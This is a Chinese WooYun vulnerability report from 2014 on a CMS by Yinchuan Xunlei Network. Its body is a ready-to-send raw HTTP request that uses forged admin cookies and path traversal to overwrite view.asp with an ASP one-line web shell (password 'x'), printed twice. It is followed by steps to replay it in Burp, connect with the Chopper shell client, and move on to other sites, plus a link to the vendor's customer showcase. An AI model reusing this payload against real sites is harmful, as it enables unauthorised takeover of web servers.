银川迅雷网络全版本通杀Getshell | wooyun-2014-062244| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-062244

漏洞标题：银川迅雷网络全版本通杀Getshell

漏洞作者：浅蓝

提交时间：2014-05-26 11:26

修复时间：2014-07-10 11:26

公开时间：2014-07-10 11:26

漏洞类型：文件上传导致任意代码执行

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-26：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-07-10：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

银川迅雷网络全版本通杀Getshell

详细说明：

POST /admin/wj.asp?Action=editfile&folder=..&url=../view.asp HTTP/1.1
Host: ************
Proxy-Connection: keep-alive
Content-Length: 709
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://nxlwtv.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://********/admin/wj.asp?Action=editfile&folder=..&url=../view.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSCCRCATR=BCCEHNEADCDFDGOAPCCDMLNM; CNZZDATA3143027=cnzz_eid%3D1585179978-1400986404-%26ntime%3D1400986404%26cnzz_a%3D0%26ltime%3D1400986403525; cmsname=admin; cmsid=1
url=..%2Fview.asp&folder=..&dpost=ok&content=%3C%21--%23include+file%3D%22inc%2Fconn.asp%22--%3E%0D%0A%3C%21--%23include+file%3D%22inc%2FLabelFunction.asp%22--%3E%0D%0A%3C%25%0D%0Aclassid%3Dconn.execute%28%22select+classid+from+cms_article+where+id+%3D+%22%26getnum%28%22id%22%29%29%280%29%0D%0Aset+rs+%3D+conn.execute%28%22select+template_view_id+from+cms_class+where+id+%3D+%22%26classid%29%0D%0Aset+aa+%3D+new+art_list%0D%0Aaa.templateurl%3DGetTemplate%284%2Crs%280%29%29%0D%0Aaa.templateaid%3Dgetnum%28%22id%22%29%0D%0Aaa.templatecid%3Dclassid%0D%0Aaa.templateapage%3Dgetnum%28%22apage%22%29%0D%0Astr%3Daa.tag%28%29%0D%0Aresponse.Write+str%0D%0A%25%3E%0D%0A%0D%0A%3C%25eval+request%28%22x%22%29%25%3E

把这段内容复制到burp repeater上 http://url/view.asp密码x

菜刀连接

换一个网站

再换一个

全版本通杀。

http://www.ycxl.net/index.php?m=Article&a=index&id=22 迅雷cms精选案例

漏洞证明：

POST /admin/wj.asp?Action=editfile&folder=..&url=../view.asp HTTP/1.1
Host: ************
Proxy-Connection: keep-alive
Content-Length: 709
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://nxlwtv.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://********/admin/wj.asp?Action=editfile&folder=..&url=../view.asp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDSCCRCATR=BCCEHNEADCDFDGOAPCCDMLNM; CNZZDATA3143027=cnzz_eid%3D1585179978-1400986404-%26ntime%3D1400986404%26cnzz_a%3D0%26ltime%3D1400986403525; cmsname=admin; cmsid=1
url=..%2Fview.asp&folder=..&dpost=ok&content=%3C%21--%23include+file%3D%22inc%2Fconn.asp%22--%3E%0D%0A%3C%21--%23include+file%3D%22inc%2FLabelFunction.asp%22--%3E%0D%0A%3C%25%0D%0Aclassid%3Dconn.execute%28%22select+classid+from+cms_article+where+id+%3D+%22%26getnum%28%22id%22%29%29%280%29%0D%0Aset+rs+%3D+conn.execute%28%22select+template_view_id+from+cms_class+where+id+%3D+%22%26classid%29%0D%0Aset+aa+%3D+new+art_list%0D%0Aaa.templateurl%3DGetTemplate%284%2Crs%280%29%29%0D%0Aaa.templateaid%3Dgetnum%28%22id%22%29%0D%0Aaa.templatecid%3Dclassid%0D%0Aaa.templateapage%3Dgetnum%28%22apage%22%29%0D%0Astr%3Daa.tag%28%29%0D%0Aresponse.Write+str%0D%0A%25%3E%0D%0A%0D%0A%3C%25eval+request%28%22x%22%29%25%3E

把这段内容复制到burp repeater上 http://url/view.asp密码x

菜刀连接

换一个网站

再换一个

全版本通杀。

http://www.ycxl.net/index.php?m=Article&a=index&id=22 迅雷cms精选案例

修复方案：

都是cookie惹的祸，求20rank

版权声明：转载请注明来源浅蓝@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝